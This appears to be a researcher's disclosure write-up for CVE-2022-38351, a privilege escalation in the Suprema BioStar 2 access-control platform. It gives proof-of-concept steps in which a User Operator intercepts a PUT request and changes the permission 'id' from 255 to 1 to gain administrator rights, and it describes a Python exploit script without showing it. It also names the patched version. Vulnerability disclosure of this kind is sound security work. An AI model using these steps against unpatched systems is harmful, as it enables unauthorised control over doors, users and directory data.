Privilege escalation from user operator to System administrator

CVE 2022-38351

Product & Service Introduction:

BioStar 2 is a web-based, open, and integrated security platform that provides comprehensive functionality for access control, time & attendance management, visitor management, and video log maintenance. It encrypts all personal data available and supports both SDKs and web APIs to integrate BioStar 2 with third-party software. In addition, users can control BioStar 2 platform remotely with the mobile app for BioStar 2 and manage a mobile access card that they can use to access sites.

Technical Description:

On Bio star 2 web application there are 7 different Operator levels, each rule has a different Privilege where the “Administrator” has the full permission to do everything on the web application while the “User Operator” has limited privilege, but due to missing server-side validation, I identified a way to escalate my Privilege from User Operator to system Administrator the attacker should be authenticated to the target website and logged in as “User Operator” to exploit this vulnerability

The security risk of the vulnerability is High with a CVSS (common vulnerability scoring system) count of 8.8

Successful exploitation of the vulnerability results in gaining admin privilege giving the attacker the ability to control the entire system such as

  • Delete, Modify and add any user
  • Delete, Modify and add any door
  • Access to all user’s information from the Active directory if the system was integrated with the AD and much more.

Proof of Concept (POC):

  • Login to the Web Application Using your “User Operator”
  • From the editing profile page intercept the request using burp suite then click on “User”
  • Apply the changes, then change the parameter “id” value from 255 to “1”. Simply 1 stands for admin 255 for users’ permission.
Updated PUT request, the value has been changed from 255 to 1.
  • Almost done the privilege has been escalated from user operator to system administrator, logout then login again to the dashboard to see the changes.
Admin User

Exploit using python:

Python script, that take 2 inputs from the user

–userid = the current user id on the system

–token the session token for the logged in user to send a PUT request then update the User Operator level.

Running the script

Solution – Fix & Patch:

Suprema recommend using the latest version of Bio star 2, at the time of publishing the blog | 2022 Q4, v2.9.1.